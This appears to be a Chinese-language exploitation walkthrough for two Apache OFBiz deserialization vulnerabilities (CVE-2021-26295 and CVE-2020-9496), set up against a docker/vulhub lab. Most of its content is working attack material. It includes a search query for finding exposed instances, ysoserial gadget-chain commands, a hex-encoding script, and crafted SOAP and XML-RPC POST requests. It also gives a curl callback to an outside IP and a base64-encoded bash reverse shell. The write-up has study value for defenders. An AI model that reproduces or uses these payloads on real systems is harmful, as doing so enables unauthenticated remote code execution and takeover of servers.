OFBiz是基于Java的Web框架,包括实体引擎,服务引擎和基于小部件的UI,是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。
CVE-2021-26295:RMI反序列化命令执行,未经身份验证的攻击者可以成功接管Apache OFBiz。
CVE-2020-9496:xmlrpc未授权反序列化导致RCE。
CVE-2021-26295:Apache OFBiz < 17.12.06
CVE-2020-9496:Apache OFBiz < 17.12.04
app=”Apache_OFBiz”
CVE-2021-26295
docker run -d -p 8000:8080 -p 8443:8443 opensourceknight/ofbiz
POST /webtools/control/SOAPService HTTP/1.1 ...... Content-Type: application/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header/> <soapenv:Body> <ser> <map-HashMap> <map-Entry> <map-Key> <cus-obj>ace......e78</cus-obj> </map-Key> <map-Value> <std-String value="http://xxxxxx.dnslog.cn"/> </map-Value> </map-Entry> </map-HashMap> </ser> </soapenv:Body> </soapenv:Envelope>
中间的cus-obj 直接用:
java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar URLDNS http://ofbiztest.xxxxxx.dnslog.cn > ofbizhex.out
然后转成hex 即可:
import binascii filename = 'ofbizhex.out' with open(filename, 'rb') as f: content = f.read() print(binascii.hexlify(content))
RCE
java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME ‘curl http://192.168.56.200:7766/testofbizrce’ > b2h10.txt
POST /webtools/control/SOAPService HTTP/1.1 ...... Content-Type: application/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/"> <soapenv:Header/> <soapenv:Body> <ser> <map-Map> <map-Entry> <map-Key> <cus-obj>aced00057......00678</cus-obj> </map-Key> <map-Value> <std-String/> </map-Value> </map-Entry> </map-Map> </ser> </soapenv:Body> </soapenv:Envelope>
反弹shell
java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME ‘bash -c {echo,YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTkyLjE2OC41Ni4yMDAvNzc2NiA8JjEn}|{base64,-d}|{bash,-i}’ > b2h11.txt
POST /webtools/control/SOAPService HTTP/1.1 ...... Content-Type: application/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/"> <soapenv:Header/> <soapenv:Body> <ser> <map-Map> <map-Entry> <map-Key> <cus-obj>aced00057......000678</cus-obj> </map-Key> <map-Value> <std-String/> </map-Value> </map-Entry> </map-Map> </ser> </soapenv:Body> </soapenv:Envelope>
CVE-2020-9496
环境:https://vulhub.org/#/environments/ofbiz/CVE-2020-9496/
https://192.168.56.200:8443/myportal/control/main
https://192.168.56.200:8443/webtools/control/xmlrpc
java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar CommonsBeanutils1 “touch /tmp/success” | base64 | tr -d “\n”
POST /webtools/control/xmlrpc HTTP/1.1 ...... Content-Type: application/xml <?xml version="1.0"?> <methodCall> <methodName>ProjectDiscovery</methodName> <params> <param> <value> <struct> <member> <name>test</name> <value> <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0......A14</serializable> </value> </member> </struct> </value> </param> </params> </methodCall>